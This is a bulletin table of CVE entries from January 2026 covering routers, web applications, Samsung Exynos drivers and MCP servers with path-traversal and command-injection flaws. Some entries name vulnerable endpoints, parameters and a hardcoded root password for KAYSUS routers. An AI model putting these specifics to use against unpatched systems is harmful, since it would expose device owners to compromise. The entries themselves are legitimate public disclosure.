| n/a--@sylphxltd/filesystem-mcp v0.5.8 | @sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its "read_content" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope. | 2026-01-07 | not yet calculated | CVE-2025-67366 | https://github.com/sylphxltd/filesystem-mcp/issues/134 https://github.com/sylphxltd/filesystem-mcp |
| n/a--AppConnector component version 10.10.0.183 and earlier of enaio 10.10, in the AppConnector component version 11.0.0.183 and earlier of enaio 11.0, and in the AppConnctor component version 11.10.0.183 and earlier of enaio 11.10 | An issue was discovered in the AppConnector component version 10.10.0.183 and earlier of enaio 10.10, in the AppConnector component version 11.0.0.183 and earlier of enaio 11.0, and in the AppConnctor component version 11.10.0.183 and earlier of enaio 11.10. The vulnerability allows authenticated remote attackers to inject arbitrary SMTP commands via crafted input to the /osrest/api/organization/sendmail endpoint | 2026-01-08 | not yet calculated | CVE-2025-56425 | https://www.optimal-systems.de/enaio https://mind-bytes.de/smtp-injection-in-enaio-component-appconnector-cve-2025-56425/ |
| n/a--Area9 Rhapsode 1.47.3 | In Area9 Rhapsode 1.47.3, an authenticated attacker can exploit the operation, url, and filename parameters via POST request to read arbitrary files from the server filesystem. Fixed in 1.47.4 (#7254) and further versions. | 2026-01-09 | not yet calculated | CVE-2025-67810 | https://area9.com https://security.area9lyceum.com/cve-2025-67810/ |
| n/a--Area9 Rhapsode 1.47.3 | Area9 Rhapsode 1.47.3 allows SQL Injection via multiple API endpoints accessible to authenticated users. Insufficient input validation allows remote attackers to inject arbitrary SQL commands, resulting in unauthorized database access and potential compromise of sensitive data. Fixed in v.1.47.4 and beyond. | 2026-01-09 | not yet calculated | CVE-2025-67811 | https://area9.com https://security.area9lyceum.com/cve-2025-67811/ |
| n/a--ARIS 10.0.23.0.3587512 | A file upload vulnerability in ARIS 10.0.23.0.3587512 allows attackers to execute arbitrary code via uploading a crafted PDF file/Malware | 2026-01-07 | not yet calculated | CVE-2025-66837 | https://www.softwareag.com/ https://github.com/saykino/CVE-2025-66837/ |
| n/a--Aris v10.0.23.0.3587512 and before | In Aris v10.0.23.0.3587512 and before, the file upload functionality does not enforce any rate limiting or throttling, allowing users to upload files at an unrestricted rate. An attacker can exploit this behavior to rapidly upload a large volume of files, potentially leading to resource exhaustion such as disk space depletion, increased server load, or degraded performance | 2026-01-07 | not yet calculated | CVE-2025-66838 | https://www.softwareag.com/ https://github.com/saykino/CVE-2025-66838/ |
| n/a--Axtion ODISSAAS ODIS v1.8.4 | A DLL hijacking vulnerability in Axtion ODISSAAS ODIS v1.8.4 allows attackers to execute arbitrary code via a crafted DLL file. | 2026-01-09 | not yet calculated | CVE-2025-66715 | https://www.axtion.nl/odis/ https://b1tsec.gitbook.io/offensive-repo/cve-repository/cve-2025-66715 |
| n/a--Blue Access Cobalt v02.000.195 | Blue Access Cobalt v02.000.195 suffers from an authentication bypass vulnerability, which allows an attacker to selectively proxy requests in order to operate functionality on the web application without the need to authenticate with legitimate credentials. | 2026-01-06 | not yet calculated | CVE-2025-60534 | http://blue.com https://github.com/PilotPatrickk/Published-CVEs/blob/main/CVE-2025-60534.md |
| n/a--ComfyUI-Manager prior to version 3.38 | An issue in ComfyUI-Manager prior to version 3.38 allowed remote attackers to potentially manipulate its configuration and critical data. This was due to the application storing its files in an insufficiently protected location that was accessible via the web interface | 2026-01-05 | not yet calculated | CVE-2025-67303 | https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md https://github.com/Comfy-Org/ComfyUI-Manager/pull/2338/commits/e44c5cef58fb4973670b86433b9d24d077b44a26 |
| n/a--CouchCMS 2.4 | An Information Disclosure vulnerability in CouchCMS 2.4 allow an Admin user to read arbitrary files via traversing directories back after back. It can Disclosure the source code or any other confidential information if weaponize accordingly. | 2026-01-09 | not yet calculated | CVE-2025-67004 | https://www.couchcms.com/ https://github.com/CouchCMS/CouchCMS https://gist.github.com/thepiyushkumarshukla/d01f8004c43692f18c75548f4739955a |
| n/a--D-Link DIR895LA1 v102b07 | A Command Injection Vulnerability has been discovered in the DHCP daemon service of D-Link DIR895LA1 v102b07. The vulnerability exists in the lease renewal processing logic where the DHCP hostname parameter is directly concatenated into a system command without proper sanitization. When a DHCP client renews an existing lease with a malicious hostname, arbitrary commands can be executed with root privileges. | 2026-01-09 | not yet calculated | CVE-2025-69542 | https://tzh00203.notion.site/D-Link-DIR895LA1-v102b07-Command-Injection-in-DHCPd-2d4b5c52018a80a1a5ccfb317b308861?source=copy_link |
| n/a--D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) | An issue was discovered in D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) allowing an attacker with physical access to the UART pins to execute arbitrary commands due to presence of root terminal access on a serial interface without proper access control. | 2026-01-08 | not yet calculated | CVE-2025-65731 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com/uk/en/products/dir-605l-wireless-n-300-home-cloud-router https://gist.github.com/whitej3rry/f142a93bac360f9b1126f552f64957ea https://github.com/whitej3rry/CVE-2025-65731 |
| n/a--DwyerOmega Isensix Advanced Remote Monitoring System (ARMS) 1.5.7 | DwyerOmega Isensix Advanced Remote Monitoring System (ARMS) 1.5.7 allows an attacker to retrieve sensitive information from the underlying SQL database via Blind SQL Injection through the user parameter in the login page. This allows an attacker to steal credentials, which may be cleartext, from existing users (and admins) and use them to authenticate to the application. | 2026-01-06 | not yet calculated | CVE-2025-59379 | https://isensix.com/guardian/ https://info.dwyeromega.com/brands https://github.com/PilotPatrickk/Published-CVEs/blob/main/CVE-2025-59379.md |
| n/a--EDIMAX BR-6208AC V2_1.02 | EDIMAX BR-6208AC V2_1.02 is vulnerable to Command Injection. This arises because the pppUserName field is directly passed to a shell command via the system() function without proper sanitization. An attacker can exploit this by injecting malicious commands into the pppUserName field, allowing arbitrary code execution. | 2026-01-09 | not yet calculated | CVE-2025-70161 | https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-setWAN-handler-2d3b5c52018a80d7ae8dce2bf5e3294c?source=copy_link |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | There is an issue on the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 that enables remote attacker to create financial discrepancies by purchasing items with a negative quantity. This vulnerability is possible due to reliance on client-side input validation controls. | 2026-01-08 | not yet calculated | CVE-2025-61546 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61546 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34. The application does not implement proper CSRF tokens or other other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates. | 2026-01-08 | not yet calculated | CVE-2025-61547 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61547 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | SQL Injection is present on the hfInventoryDistFormID parameter in the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. Unsanitized user input is incorporated directly into SQL queries without proper parameterization or escaping. This vulnerability allows remote attackers to execute arbitrary SQL commands | 2026-01-08 | not yet calculated | CVE-2025-61548 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61548 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. This allows attackers to execute arbitrary JavaScript in the context of a victim s browser session | 2026-01-08 | not yet calculated | CVE-2025-61549 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61549 |
| n/a--edu Business Solutions Print Shop Pro WebDesk version 18.34 | Cross-Site Scripting (XSS) is present on the ctl00_Content01_fieldValue parameters on the /psp/appNet/TemplateOrder/TemplatePreview.aspx endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34. User-supplied input is stored and later rendered in HTML pages without proper output encoding or sanitization. This allows attackers to persistently inject arbitrary JavaScript that executes in the context of other users' sessions | 2026-01-08 | not yet calculated | CVE-2025-61550 | https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61550 |
| n/a--Employee Leave Management System v.2.1 | Cross Site Request Forgery vulnerability in Employee Leave Management System v.2.1 allows a remote attacker to escalate privileges via the manage-employee.php component | 2026-01-05 | not yet calculated | CVE-2025-67315 | https://phpgurukul.com/employee-leaves-management-system-elms/ https://github.com/r-pradyun/CVE-2025-67315 |
| n/a--evershop 2.1.0 | A Denial of Service (DoS) vulnerability in evershop 2.1.0 and prior allows unauthenticated attackers to exhaust the application server's resources via the "GET /images" API. The application fails to limit the height of the use-element shadow tree or the dimensions of pattern tiles during the processing of SVG files, resulting in unbounded resource consumption and system-wide denial of service. | 2026-01-05 | not yet calculated | CVE-2025-67419 | https://github.com/evershopcommerce/evershop https://github.com/dos-m0nk3y/CVE/tree/main/CVE-2025-67419 |
| n/a--evershop 2.1.0 | A Blind Server-Side Request Forgery (SSRF) vulnerability in evershop 2.1.0 and prior allows unauthenticated attackers to force the server to initiate an HTTP request via the "GET /images" API. The vulnerability occurs due to insufficient validation of the "src" query parameter, which permits arbitrary HTTP or HTTPS URIs, resulting in unexpected requests against internal and external networks. | 2026-01-05 | not yet calculated | CVE-2025-67427 | https://github.com/evershopcommerce/evershop https://github.com/dos-m0nk3y/CVE/tree/main/CVE-2025-67427 |
| n/a--fast-filesystem-mcp version 3.4.0 | fast-filesystem-mcp version 3.4.0 contains a critical path traversal vulnerability in its file operation tools including fast_read_file. This vulnerability arises from improper path validation that fails to resolve symbolic links to their actual physical paths. The safePath and isPathAllowed functions use path.resolve() which does not handle symlinks, allowing attackers to bypass directory access restrictions by creating symlinks within allowed directories that point to restricted system paths. When these symlinks are accessed through valid path references, the validation checks are circumvented, enabling access to unauthorized files. | 2026-01-07 | not yet calculated | CVE-2025-67364 | https://github.com/efforthye/fast-filesystem-mcp/issues/10 https://github.com/efforthye/fast-filesystem-mcp |
| n/a--fluidsynth-2.4.6 and earlier versions | fluidsynth-2.4.6 and earlier versions is vulnerable to Null pointer dereference in fluid_synth_monopoly.c, that can be triggered when loading an invalid midi file. | 2026-01-09 | not yet calculated | CVE-2025-56225 | https://github.com/FluidSynth/fluidsynth/issues/1602 https://github.com/FluidSynth/fluidsynth/pull/1607 |
| n/a--Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 | The LuCI web interface on Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 are vulnerable. Fix available in version 4.8.2 GL.Inet AX1800 Version 4.6.4 & 4.6.8 lacks rate limiting or account lockout mechanisms on the authentication endpoint (`/cgi-bin/luci`). An unauthenticated attacker on the local network can perform unlimited password attempts against the admin interface. | 2026-01-08 | not yet calculated | CVE-2025-67090 | https://www.gl-inet.com/security/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51 |
| n/a--GL-iNet GL-AXT1800 router firmware v4.6.8 | A command injection vulnerability exists in the GL-iNet GL-AXT1800 router firmware v4.6.8. The vulnerability is present in the `plugins.install_package` RPC method, which fails to properly sanitize user input in package names. Authenticated attackers can exploit this to execute arbitrary commands with root privileges | 2026-01-08 | not yet calculated | CVE-2025-67089 | https://www.gl-inet.com/security-updates/ https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub |
| n/a--H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point | An issue in H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point, there is a misconfiguration vulnerability about vsftpd. Through this vulnerability, all files uploaded anonymously via the FTP protocol is automatically owned by the root user and remote attackers could gain root-level control over the devices. | 2026-01-06 | not yet calculated | CVE-2025-60262 | https://www.notion.so/23e54a1113e780d686fbe1624ee0465d https://www.notion.so/Misconfiguration-in-H3C-23e54a1113e780d686fbe1624ee0465d |
| n/a--Hero Motocorp Vida V1 Pro 2.0.7 | An issue in Hero Motocorp Vida V1 Pro 2.0.7 allows a local attacker to cause a denial of service via the BLE component | 2026-01-09 | not yet calculated | CVE-2025-67133 | http://hero.com http://vida.com https://threadpoolx.gitbook.io/docs/cve/cve-2025-67133-denial-of-service-via-unauthenticated-ble-connection |
| n/a--indieka900 online-shopping-system-php 1.0 | indieka900 online-shopping-system-php 1.0 is vulnerable to SQL Injection in master/review_action.php via the proId parameter. | 2026-01-08 | not yet calculated | CVE-2025-61246 | https://github.com/hackergovind/CVE-2025-61246 |
| n/a--Insiders Technologies GmbH e-invoice pro before release 1 | An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script | 2026-01-08 | not yet calculated | CVE-2025-56424 | https://insiders-technologies.com/en/e-invoice/ https://mind-bytes.de/xml-external-entity-xxe-injection-in-e-invoice-pro-cve-2025-56424/ |
| n/a--Intelbras CFTV IP NVD 9032 R Ftd V2.800.00IB00C.0.T | A vulnerability exists in Intelbras CFTV IP NVD 9032 R Ftd V2.800.00IB00C.0.T, which allows an unauthenticated attacker to bypass the multi-factor authentication (MFA) mechanism during the password recovery process. This results in the ability to change the admin password and gain full access to the administrative panel. | 2026-01-09 | not yet calculated | CVE-2025-67070 | https://github.com/teteco/intelbras-cftv-admin-bypass |
| n/a--JimuReport thru version 2.1.3 | JimuReport thru version 2.1.3 is vulnerable to remote code execution when processing user-controlled H2 JDBC URLs. The application passes the attacker-supplied JDBC URL directly to the H2 driver, allowing the use of certain directives to execute arbitrary Java code. A different vulnerability than CVE-2025-10770. | 2026-01-08 | not yet calculated | CVE-2025-66913 | https://github.com/jeecgboot/jimureport/issues/4306 https://gist.github.com/Catherines77/f15d53e9705b24cf018e5bffed3e8234 |
| n/a--KAYSUS KS-WR1200 routers with firmware 107 | KAYSUS KS-WR1200 routers with firmware 107 expose SSH and TELNET services on the LAN interface with hardcoded root credentials (root:12345678). The administrator cannot disable these services or change the hardcoded password. (Changing the management GUI password does not affect SSH/TELNET authentication.) Any LAN-adjacent attacker can trivially log in with root privileges. | 2026-01-08 | not yet calculated | CVE-2025-68718 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68718.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 enable the SSH service enabled by default on the LAN interface. The root account is configured with no password, and administrators cannot disable SSH or enforce authentication via the CLI or web GUI. This allows any LAN-adjacent attacker to trivially gain root shell access and execute arbitrary commands with full privileges. | 2026-01-08 | not yet calculated | CVE-2025-68716 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68716.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication. | 2026-01-08 | not yet calculated | CVE-2025-68717 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68717.txt |
| n/a--KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 | KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. This archive contains sensitive files such as /etc/shadow, enabling credential recovery and potential full compromise of the device. | 2026-01-08 | not yet calculated | CVE-2025-68719 | https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html https://github.com/actuator/cve/tree/main/KAYSUS https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68719.txt |
| n/a--Mega-Fence (webgate-lib.*) 25.1.914 and prior | Mega-Fence (webgate-lib.*) 25.1.914 and prior trusts the first value of the X-Forwarded-For (XFF) header as the client IP without validating a trusted proxy chain. An attacker can supply an arbitrary XFF value in a remote request to spoof the client IP, which is then propagated to security-relevant state (e.g., WG_CLIENT_IP cookie). Deployments that rely on this value for IP allowlists may be bypassed. | 2026-01-05 | not yet calculated | CVE-2025-65328 | https://drive.proton.me/urls/MY05PVBFXG#xDd2Xqy98WM9 https://raw.githubusercontent.com/p1aintext/CVE/main/CVE-2025-65328.md |
| n/a--Nitro PDF Pro for Windows before 14.42.0.34. | An issue was discovered in Nitro PDF Pro for Windows before 14.42.0.34. In certain cases, it displays signer information from a non-verified PDF field rather than from the verified certificate subject. This could allow a document to present inconsistent signer details. The display logic was updated to ensure signer information consistently reflects the verified certificate identity. | 2026-01-08 | not yet calculated | CVE-2025-67825 | https://gonitro.com https://www.gonitro.com/documentation/release-notes |
| n/a--NJHYST HY511 POE core before 2.1 and plugins before 0.1. | An issue was discovered in NJHYST HY511 POE core before 2.1 and plugins before 0.1. The vulnerability stems from the device's insufficient cookie verification, allowing an attacker to directly request the configuration file address and download the core configuration file without logging into the device management backend. By reading the corresponding username and self-decrypted MD5 password in the core configuration file, the attacker can directly log in to the backend, thereby bypassing the front-end backend login page. | 2026-01-06 | not yet calculated | CVE-2025-65212 | https://github.com/a2148001284/test1/blob/main/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%90%8E%E5%8F%B0%E6%BC%8F%E6%B4%9EEN.md https://gist.github.com/a2148001284/bcdda75fc8718454f16a7b9259463719 |
| n/a--OpenAirInterface CN5G AMF<=v2.0.1 | OpenAirInterface CN5G AMF<=v2.0.1 There is a logical error when processing JSON format requests. Unauthorized remote attackers can send malicious JSON data to AMF's SBI interface to launch a denial-of-service attack. | 2026-01-07 | not yet calculated | CVE-2025-66786 | https://github.com/swallele/Vulnerability/blob/main/Openairinterface/Dos/Json_Dos.md |
| n/a--OpenAirInterface CN5G AMF<=v2.1.9 | OpenAirInterface CN5G AMF<=v2.1.9 has a buffer overflow vulnerability in processing NAS messages. Unauthorized remote attackers can launch a denial-of-service attack and potentially execute malicious code by accessing port N1 and sending an imsi string longer than 1000 to AMF. | 2026-01-07 | not yet calculated | CVE-2025-65805 | https://github.com/swallele/Vulnerability/blob/main/Openairinterface/Buffer_Overflow/Vulnerability_Report.md |
| n/a--Panda Wireless PWRU0 devices with firmware 2.2.9 | An issue was discovered in Panda Wireless PWRU0 devices with firmware 2.2.9 that exposes multiple HTTP endpoints (/goform/setWan, /goform/setLan, /goform/wirelessBasic) that do not enforce authentication. A remote unauthenticated attacker can modify WAN, LAN, and wireless settings directly, leading to privilege escalation and denial of service. | 2026-01-08 | not yet calculated | CVE-2025-68715 | https://github.com/actuator/cve/tree/main/PandaWireless https://github.com/actuator/cve/blob/main/PandaWireless/CVE-2025-68715.txt |
| n/a--Passy v.1.6.3 | An issue in Passy v.1.6.3 allows a remote authenticated attacker to execute arbitrary commands via a crafted HTTP request using a specific payload injection. | 2026-01-05 | not yet calculated | CVE-2025-67397 | https://www.passy.it/ https://github.com/giulioschiavone/Vulnerability-Research/tree/main/CVE-2025-67397 |
| n/a--Perch CMS version 3.2 | A stored Cross-Site Scripting (XSS) vulnerability exists in Perch CMS version 3.2. An authenticated attacker with administrative privileges can inject malicious JavaScript code into the "Help button url" setting within the admin panel. The injected payload is stored and executed when any authenticated user clicks the Help button, potentially leading to session hijacking, information disclosure, privilege escalation, and unauthorized administrative actions. | 2026-01-07 | not yet calculated | CVE-2025-66686 | https://github.com/mertdurum06/Perch-v3.2 https://github.com/mertdurum06/Perch-v3.2/blob/main/Perch%20v3.2_Poc.txt |
| n/a--phpgurukul Hostel Management System v2.1 | Cross-Site Scripting in phpgurukul Hostel Management System v2.1 user-provided complaint fields (Explain the Complaint) submitted via /register-complaint.php are stored and rendered unescaped in the admin viewer (/admin/complaint-details.php?cid=<id>). When an administrator opens the complaint, injected HTML/JavaScript executes in the admin's browser. | 2026-01-08 | not yet calculated | CVE-2025-63611 | https://phpgurukul.com/hostel-management-system/ https://medium.com/@tanushkushtk01/cve-2025-63611-stored-cross-site-scripting-xss-in-hostel-management-system-v2-1-a23c2efc86ea |
| n/a--Plesk Obsidian versions 8.0.1 through 18.0.73 | Plesk Obsidian versions 8.0.1 through 18.0.73 are vulnerable to a Denial of Service (DoS) condition. The vulnerability exists in the get_password.php endpoint, where a crafted request containing a malicious payload can cause the affected web interface to continuously reload, rendering the service unavailable to legitimate users. An attacker can exploit this issue remotely without authentication, resulting in a persistent availability impact on the affected Plesk Obsidian instance. | 2026-01-08 | not yet calculated | CVE-2025-65518 | http://plesk.com https://github.com/Jainil-89/CVE-2025-65518/blob/main/cve.md https://docs.plesk.com/release-notes/obsidian/change-log/ |
| n/a--pss.sale.com 1.0 | SQL injection vulnerability in pss.sale.com 1.0 via the id parameter to the userfiles/php/cancel_order.php endpoint. | 2026-01-09 | not yet calculated | CVE-2025-51626 | https://gitee.com/XiaoLiuChu/pss.sale.com/tree/master https://gist.github.com/hnking-star/17d4c9c990c2324ef109fecb4fc4630c |
| n/a--QloApps versions 1.7.0 and earlier | Unrestricted file upload in the hotel review feature in QloApps versions 1.7.0 and earlier allows remote unauthenticated attackers to achieve remote code execution. | 2026-01-08 | not yet calculated | CVE-2025-67325 | https://github.com/Qloapps/QloApps https://github.com/mr7s3d0/CVE-2025-67325 |
| n/a--RuoYi-Vue-Plus versions 5.5.1 and earlier | The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier, interface /snail-job/workflow/check-node-expression can execute QLExpress expressions, but it does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing. | 2026-01-08 | not yet calculated | CVE-2025-66916 | https://gitee.com/dromara/RuoYi-Vue-Plus https://github.com/Catherines77/code-au/blob/main/ruoyi-vue-plus/QLExpress.md https://gist.github.com/Catherines77/e3f06b9c4cc6298579e858088a243c3d |
| n/a--Samsung Magician 6.3.0 through 8.3.2 on Windows | An issue was discovered in Samsung Magician 6.3.0 through 8.3.2 on Windows. The installer creates a temporary folder with weak permissions during installation, allowing a non-admin user to perform DLL hijacking and escalate privileges. | 2026-01-05 | not yet calculated | CVE-2025-57836 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57836/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. A race condition in the issimian device driver results in an out-of-bounds access, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52515 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52515/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. An invalid kernel address dereference in the issimian device driver leads to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52516 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52516/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500. A race condition in the issimian device driver results in a double free, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52517 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52517/ |
| n/a--Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, 2500 | An issue was discovered in the Camera in Samsung Mobile Processor and Wearable Processor Exynos 1330, 1380, 1480, 2400, 1580, and 2500. Improper validation of user-space input in the issimian device driver leads to information disclosure and a denial of service. | 2026-01-05 | not yet calculated | CVE-2025-52519 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52519/ |
| n/a--Samsung Mobile Processor Exynos 1380, 1480, 2400, 1580 | An issue was discovered in the WiFi driver in Samsung Mobile Processor Exynos 1380, 1480, 2400, 1580. Mishandling of an NL80211 vendor command leads to a buffer overflow. | 2026-01-05 | not yet calculated | CVE-2025-49495 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-49495/ |
| n/a--Samsung Mobile Processor Exynos 1380, 1480, 2400, and 1580 | An issue was discovered in Samsung Mobile Processor Exynos 1380, 1480, 2400, and 1580. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow during handling of an IOCTL message. | 2026-01-05 | not yet calculated | CVE-2025-53966 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-53966/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400 | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The lack of a length check leads to out-of-bounds writes via malformed NAS packets. | 2026-01-05 | not yet calculated | CVE-2025-27807 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-27807/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400 | An issue was discovered in L2 in c. Incorrect handling of RRC packets leads to a Denial of Service. | 2026-01-05 | not yet calculated | CVE-2025-43706 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-43706/ |
| n/a--shiori v1.7.4 | A lack of rate limiting in the login page of shiori v1.7.4 and below allows attackers to bypass authentication via a brute force attack. | 2026-01-09 | not yet calculated | CVE-2025-60538 | https://github.com/go-shiori/shiori https://github.com/go-shiori/shiori/issues/1138 |
| n/a--sonirico mcp-shell v0.3.1 | A command injection vulnerability in the shell_exec function of sonirico mcp-shell v0.3.1 allows attackers to execute arbitrary commands via supplying a crafted command string. | 2026-01-07 | not yet calculated | CVE-2025-61489 | https://github.com/sonirico/mcp-shell https://github.com/sonirico/mcp-shell/issues/4 |
| n/a--Technitium DNS Server v.13.5 | An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component | 2026-01-08 | not yet calculated | CVE-2025-50334 | https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md http://technitium.com https://github.com/TechnitiumSoftware/DnsServer/blob/v13.3/DnsServerCore/Dns/DnsServer.cs https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-50334 https://github.com/TechnitiumSoftware/DnsServer/commit/7229b217238213cc6275eea68a7e17d73df1603e |
| n/a--terminal-controller-mcp 0.1.7 | A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input. | 2026-01-07 | not yet calculated | CVE-2025-61492 | https://github.com/cfdude/super-shell-mcp/issues/19 https://github.com/GongRzhe/terminal-controller-mcp https://github.com/GongRzhe/terminal-controller-mcp/issues/7 |
| n/a--TIM BPM Suite/ TIM FLOW through 9.1.2 | In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Authorization Bypass vulnerabilities exists which allow a low privileged user to download password hashes of other user, access work items of other user, modify restricted content in workflows, modify the applications logo and manipulate the profile of other user. | 2026-01-09 | not yet calculated | CVE-2025-67282 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
| n/a--TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 | An issue in TIM Solution GmbH TIM BPM Suite & TIM FLOW before v.9.1.2 allows a remote attacker to escalate privileges via a crafted HTTP request | 2026-01-09 | not yet calculated | CVE-2025-67278 | https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ |
